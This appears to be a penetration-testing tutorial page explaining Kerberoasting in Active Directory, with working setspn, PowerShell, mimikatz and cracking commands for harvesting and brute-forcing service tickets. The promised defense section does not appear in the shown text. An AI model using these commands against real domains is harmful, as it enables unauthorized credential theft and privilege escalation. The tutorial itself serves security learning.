Kerberoasting

0x00 Preface

Kerberoasting is a technique often used in domain penetration. This article will refer to public information and combine my own understanding to introduce the principle and implementation of Kerberoasting, as well as a method of backdoor utilization, and finally give defense suggestions.

Reference materials:

http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
http://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/
https://malicious.link/post/2016/kerberoast-pt1/
https://malicious.link/post/2016/kerberoast-pt2/
https://malicious.link/post/2016/kerberoast-pt3/
https://adsecurity.org/?p=3458
https://adsecurity.org/?page_id=183
https://blog.netspi.com/faster-domain-escalation-using-ldap/
https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx

0x01 introduction

This article will introduce the following:

Kerberoasting related concepts
Principle of Kerberoasting
Implementation of Kerberoasting
Kerberoasting's backdoor utilization
Kerberoasting defense

0x02 basic concepts

SPN

Official documents:

https://docs.microsoft.com/en-us/windows/desktop/AD/service-principal-names

Full nameService Principal Names

The Service Principal Name (SPN) is a unique identifier for a service instance. Active Directory Domain Services and Windows provide support for Service Principal Names (SPNs), which are key components of the Kerberos mechanism through which a client authenticates a service.

There are two types of SPN, one is registered under the machine account (Computers) on the AD, and the other is registered under the domain user account (Users)

When the authority of a service is Local SystemOR Network Service, the SPN is registered under the machine account (Computers)

When the authority of a service is a domain user, the SPN is registered under the domain user account (Users)

SPN format

serviceclass/host:port/servicename

Description:

serviceclass can be understood as the name of the service, common ones include www, ldap, SMTP, DNS, HOST, etc.
There are two forms of host, FQDN and NetBIOS name, such as server01.test.com and server01
If the service is running on the default port, the port number (port) can be omitted

Query SPN

Initiating an LDAP query to the domain controller is part of the normal kerberos ticket behavior, so the operation of querying the SPN is difficult to detect

(1) Use SetSPN

Tools that come with Win7 and Windows Server2008

View all SPNs in the current domain:

setspn.exe -q */*

View all SPNs in the test domain:

setspn.exe -T test -q */*

Examples of output results:

CN=DC1,OU=Domain Controllers,DC=test,DC=com
        exchangeRFR/DC1
        exchangeRFR/DC1.test.com
        exchangeMDB/DC1.test.com
        exchangeMDB/DC1
        exchangeAB/DC1
        exchangeAB/DC1.test.com
        SMTP/DC1
        SMTP/DC1.test.com
        SmtpSvc/DC1
        SmtpSvc/DC1.test.com
        ldap/DC1.test.com/ForestDnsZones.test.com
        ldap/DC1.test.com/DomainDnsZones.test.com
        Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC1.test.com
        DNS/DC1.test.com
        GC/DC1.test.com/test.com
        RestrictedKrbHost/DC1.test.com
        RestrictedKrbHost/DC1
        HOST/DC1/TEST
        HOST/DC1.test.com/TEST
        HOST/DC1
        HOST/DC1.test.com
        HOST/DC1.test.com/test.com
        E3514235-4B06-11D1-AB04-00C04FC2DCD2/0f33253b-2314-40f0-b665-f4317b13e6b9/test.com
        ldap/DC1/TEST
        ldap/0f33253b-2314-40f0-b665-f4317b13e6b9._msdcs.test.com
        ldap/DC1.test.com/TEST
        ldap/DC1
        ldap/DC1.test.com
        ldap/DC1.test.com/test.com
CN=krbtgt,CN=Users,DC=test,DC=com
        kadmin/changepw
CN=COMPUTER01,CN=Computers,DC=test,DC=com
        RestrictedKrbHost/COMPUTER01
        HOST/COMPUTER01
        RestrictedKrbHost/COMPUTER01.test.com
        HOST/COMPUTER01.test.com
CN=MSSQL Service Admin,CN=Users,DC=test,DC=com
        MSSQLSvc/DC1.test.com

Each line starting with CN represents an account, and the information under it is the SPN associated with the account

For the output data above, the machine account (Computers) is:

CN=DC1,OU=Domain Controllers,DC=test,DC=com
CN=COMPUTER01,CN=Computers,DC=test,DC=com

Domain user accounts (Users) are:

CN=krbtgt,CN=Users,DC=test,DC=com
CN=MSSQL Service Admin,CN=Users,DC=test,DC=com

There are two SPNs registered under the domain user account (Users): kadmin/changepwandMSSQLSvc/DC1.test.com

0x03 Principle of Kerberoasting

“Kerberos is for authentication not for authorization, this lacuna allows kerberoasting”

1. Kerberos authentication process

A simple Kerberos authentication process is shown below

For 4.tgs_reply, the user will receive the TGS (service ticket) encrypted by the NTLM hash of the target service instance, the encryption algorithm isRC4-HMAC

From the perspective of utilization, after obtaining this TGS, we can try to exhaust passwords, simulate the encryption process, and generate TGS for comparison. If the TGS is the same, the representative password is correct, and the plaintext password of the target service instance can be obtained

2. The Windows system obtains the correspondence between services and service instance accounts through SPN query

Here is an example:

User a wants to access the resources of the MySQL service. When it reaches 4.tgs_reply, the steps are as follows:

(1)Domain Controller queries the SPN of MySQL service

If the SPN is registered under the machine account (Computers), the servicePrincipalName attribute of all machine accounts (Computers) will be queried to find the corresponding account

If the SPN is registered under a domain user account (Users), the servicePrincipalName attribute of all domain users (Users) will be queried to find the corresponding account

(2) After finding the corresponding account, use the NTLM hash of the account to generate TGS

3. All hosts in the domain can query SPN

4. Any user in the domain can request TGS from any service in the domain

In summary, any host in the domain can request TGS from all services in the domain by querying the SPN, and brute force it after obtaining the TGS

For the cracked plaintext password, only the password of the domain user account (Users) has value, regardless of the password of the machine account (cannot be used for remote connections)

Therefore, the efficient use of ideas is as follows:

To query the SPN and find a valuable SPN, the following conditions must be met:
- The SPN is registered under the domain user account (Users)
- Domain user account has high permissions
Request TGS
Export TGS
Brute force

0x04 Kerberoasting implementation method one

1. Get valuable SPN

The following conditions need to be met:

The SPN is registered under the domain user account (Users)
Domain user account has high permissions

You can choose from the following three methods:

(1) Use the powershell module Active Directory

Note: The powershell module Active Directory needs to be installed in advance, and domain controllers usually install it

import-module ActiveDirectory
get-aduser -filter {AdminCount -eq 1 -and (servicePrincipalName -ne 0)} -prop * |select name,whencreated,pwdlastset,lastlogon

For systems that have not installed the Active Directory module, you can import the Active Directory module through the following command:

import-module .\Microsoft.ActiveDirectory.Management.dll

(2) Use PowerView

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Get-NetUser -spn -AdminCount|Select name,whencreated,pwdlastset,lastlogon

(3) Use kerberoast

powershell:

https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1

vbs:

https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.vbs

The parameters are as follows:

cscript GetUserSPNs.vbs

2. Request TGS

(1) Request to specify TGS

$SPNName = 'MSSQLSvc/DC1.test.com'
Add-Type -AssemblyNAme System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPNName

(2) Request all TGS

Add-Type -AssemblyName System.IdentityModel  
setspn.exe -q */* | Select-String '^CN' -Context 0,1 | % { New-Object System. IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

After execution, enter to klistview the ticket in the memory, you can find the obtained TGS

3. Export

Use mimikatz

kerberos::list /export

4. Crack

https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py

./tgsrepcrack.py wordlist.txt test.kirbi

0x05 Kerberoasting implementation method two

Automatic implementation, and does not require mimikatz, ordinary user permissions are sufficient, reference materials:

http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/

Code address:

https://github.com/EmpireProject/Empire/commit/6ee7e036607a62b0192daed46d3711afc65c3921

Use System.IdentityModel.Tokens.KerberosRequestorSecurityTokenrequest TGS, extract TGS from the returned result, and choose John the Ripper or Hashcat to crack the output TGS

Kerberoasting Major Steps

This attack is multiple steps process as given below:

PreviousAbusing AdminSDHolder for Persistence NextWhat is Kerberos and how it works (ar)

Last updated 5 years ago

Was this helpful?